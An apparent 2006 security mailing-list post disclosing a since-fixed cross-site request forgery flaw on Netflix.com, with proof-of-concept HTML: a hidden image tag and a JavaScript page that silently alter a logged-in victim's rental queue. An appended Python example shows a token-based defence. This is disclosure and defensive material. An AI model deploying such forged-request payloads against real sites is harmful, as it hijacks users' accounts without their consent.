WebApp Sec mailing list archives

Netflix.com XSRF vuln


From: "Dave Ferguson" <gmdavef () gmail com>
Date: Mon, 16 Oct 2006 08:51:41 -0500

I just posted information to the Full Disclosure list about a Cross
Site Request Forgery (XSRF) vulnerability on Netflix.com.  Netflix has
recently fixed several of the most serious issues.

Some of you in the U.S. may be Netflix subscribers.  Here are some of
the things that could have been done to you if you visited the wrong
web page.

- add movies to your rental queue
- add a movie to the top of your rental queue
- change the name and address on your account
- change the email address and password on your account (i.e., take
over your account)
- cancel your account (Unconfirmed/Conjectured)

The exploits are extremely simple and are especially effective if the
victim chooses to stay logged on to the Netflix site.  For example, to
add a DVD to a victim's queue, an attacker would add an image tag to
his web page and just wait for Netflix subscribers to visit the page.

<img src="http://www.netflix.com/AddToQueue?movieid=70011204"
width="1" height="1" border="0">

Adding a DVD to the top of the queue takes a little JavaScript, but is
even nastier because it would probably be shipped before the victim
knew what had happened.

<html>
<head>
<script language="JavaScript" type="text/javascript">
function load_image2()
{
 var img2 = new Image();
 img2.src="http://www.netflix.com/MoveToTop?movieid=70023965&fromq=true";
}
</script>
</head>
<body>
<img src="http://www.netflix.com/AddToQueue?movieid=70023965"
width="1" height="1" border="0">
<script>
setTimeout( 'load_image2()', 2000 );
</script>
</body>
</html>

I think XSRF could be a sleeping giant, kind of like XSS was a year or
two ago.  Jesse Burns has a great whitepaper about XSRF here:
http://www.isecpartners.com/documents/XSRF_Paper.pdf

Regards,

Dave Ferguson
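The image-tag requests above succeed because the browser attaches the victim's session cookie to any GET the page asks for. The following is an added example, not code from the post or from Netflix: a minimal server-side handler that refuses state-changing requests over GET and requires a per-session synchronizer token that a third-party page cannot read. The endpoint names and session layout are assumptions for illustration.

```python
# Added example (not from the original post): synchronizer-token defence
# against the <img>-driven requests described above.
import hmac
import secrets

# Hypothetical state-changing endpoints, named after those in the post.
STATE_CHANGING = {"/AddToQueue", "/MoveToTop"}


def new_session():
    """Create a logged-in session carrying a random per-session CSRF token."""
    return {"user": "subscriber",
            "csrf_token": secrets.token_urlsafe(32),
            "queue": []}


def render_form(session, movieid):
    """Hypothetical page generator: the token is embedded in the site's own
    form, so only a page served by the site (not an attacker's) can send it."""
    return ('<form method="POST" action="/AddToQueue">'
            f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
            f'<input type="hidden" name="movieid" value="{movieid}"></form>')


def handle(session, method, path, params):
    """Dispatch one request; return (status, body)."""
    if path not in STATE_CHANGING:
        return 200, "ok"
    # An <img src=...> can only issue a GET, so it never reaches the next check.
    if method != "POST":
        return 405, "state-changing requests must be POST"
    supplied = params.get("csrf_token", "")
    # Constant-time comparison against the token bound to this session.
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    movie = params["movieid"]
    if path == "/AddToQueue":
        session["queue"].append(movie)
    else:  # /MoveToTop
        if movie in session["queue"]:
            session["queue"].remove(movie)
        session["queue"].insert(0, movie)
    return 200, f"queue={session['queue']}"
```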

